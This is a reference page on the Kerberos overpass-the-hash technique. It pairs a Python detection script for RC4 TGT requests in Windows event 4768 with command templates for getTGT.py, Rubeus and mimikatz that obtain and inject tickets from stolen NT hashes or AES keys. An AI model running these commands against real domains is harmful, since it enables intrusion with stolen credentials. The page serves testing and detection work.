Overpass the hash

Theory

In short, an attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) or indirectly over Kerberos (overpass-the-hash, also known as pass-the-key).

With overpass-the-hash, an attacker can leverage a user's NT hash to request a TGT, which can then be used with pass-the-ticket to request a Service ticket and access a service using Kerberos. This is possible only when the RC4 etype is enabled for Kerberos, which is the case by default.

When the RC4 etype is not enabled, the other keys (DES, AES) can be passed in the same way, hence the alias for this technique, "pass the key".
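Because the NT hash only yields the RC4 key, a TGT obtained this way is issued with the RC4-HMAC encryption type (0x17), which is what a defender looks for in Windows Security event 4768 (TGT requested). The script below is an added detection example, not part of the original page: it runs over constructed sample 4768 records (field names are the event's own, values are made up), keeps the successful requests issued with an RC4 etype, and groups them by requesting address. The caveat a practitioner wants is the one in the comments: RC4 TGT requests are only anomalous where AES is expected, so accounts whose password predates AES enablement and non-Windows clients produce legitimate hits.

```python
"""Flag Kerberos TGT requests (Windows Security event 4768) that were issued
with an RC4 encryption type, the etype that overpass-the-hash tooling ends up
with when it only holds a user's NT hash.

Added example, not code from the original page or from any of the tools it
describes. The event records below are constructed sample data in the shape of
the 4768 event's fields (TargetUserName, IpAddress, TicketEncryptionType,
Status); the values are invented.
"""
from collections import defaultdict

# Ticket encryption types as logged in the TicketEncryptionType field of 4768.
ETYPE_NAMES = {
    0x1: "DES-CBC-CRC",
    0x3: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC",
    0x18: "RC4-HMAC-EXP",
}
RC4_ETYPES = {0x17, 0x18}

# Constructed sample events. In a domain with AES enabled, domain-joined Windows
# clients normally request 0x12; an RC4 (0x17) TGT from such a host stands out.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "j.doe", "IpAddress": "::ffff:10.0.0.25",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.0.25",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "j.doe", "IpAddress": "::ffff:10.0.0.77",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Service ticket request (4769): out of scope for this check.
    {"EventID": 4769, "TargetUserName": "j.doe", "IpAddress": "::ffff:10.0.0.25",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Failed pre-authentication (0x18 = KDC_ERR_PREAUTH_FAILED): no ticket issued.
    {"EventID": 4768, "TargetUserName": "a.smith", "IpAddress": "::ffff:10.0.0.30",
     "TicketEncryptionType": "0x17", "Status": "0x18"},
]


def find_rc4_tgt_requests(events):
    """Return the successful 4768 events whose TGT was issued with an RC4 etype.

    Caveat: an account whose password was last set before AES was enabled in
    the domain has no AES keys, and legacy or non-Windows clients may only
    speak RC4, so hits need the expected etype of the source and account as
    context before being treated as overpass-the-hash.
    """
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if int(ev.get("Status", "0x0"), 16) != 0:
            continue  # no ticket was issued, nothing to pass
        etype = int(ev["TicketEncryptionType"], 16)
        if etype in RC4_ETYPES:
            hits.append(ev)
    return hits


def rc4_requests_by_source(events):
    """Group RC4 TGT requests by requesting address.

    A single host asking for RC4 tickets on behalf of several accounts is the
    pattern a credential-reuse investigation starts from.
    """
    by_ip = defaultdict(set)
    for ev in find_rc4_tgt_requests(events):
        by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_ip.items()}


def describe(ev):
    """One-line human-readable summary of a flagged event."""
    etype = int(ev["TicketEncryptionType"], 16)
    name = ETYPE_NAMES.get(etype, hex(etype))
    return f"{ev['TargetUserName']} from {ev['IpAddress']} was issued a TGT with etype {name}"


if __name__ == "__main__":
    for ev in find_rc4_tgt_requests(SAMPLE_EVENTS):
        print(describe(ev))
    print(rc4_requests_by_source(SAMPLE_EVENTS))
```

Feeding real events in requires only mapping the exported 4768 fields onto the same keys; the etype and status parsing accept the hexadecimal strings the Windows event log uses.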

Practice

The Impacket script getTGT (Python) can request a TGT (Ticket Granting Ticket) given a password, hash (LMhash can be empty), or aesKey. The TGT will be saved as a ccache file that can then be used by other Impacket scripts.

# with a password
getTGT.py $DOMAIN/$USER:$PASSWORD@$TARGET

# with an NT hash (the LM hash part can be left empty)
getTGT.py -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET

# with an AES (128 or 256 bits) key, given as a hex string
getTGT.py -aesKey $AESKEY $DOMAIN/$USER@$TARGET

Once a TGT is obtained, the tester can use it with the environment variable KRB5CCNAME with tools implementing pass-the-ticket.

On Windows, requesting a TGT can be achieved with Rubeus (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.

# with an NT hash
Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt

# with an AES 128 key
Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt

# with an AES 256 key
Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt

An alternative to Rubeus is mimikatz.

# with an NT hash
sekurlsa::pth /user:$USER /domain:$DOMAIN /rc4:$NThash /ptt

# with an AES 128 key
sekurlsa::pth /user:$USER /domain:$DOMAIN /aes128:$aes128_key /ptt

# with an AES 256 key
sekurlsa::pth /user:$USER /domain:$DOMAIN /aes256:$aes256_key /ptt

For both mimikatz and Rubeus, the /ptt flag injects the obtained ticket into the current session, so no separate pass-the-ticket step is needed.

Resources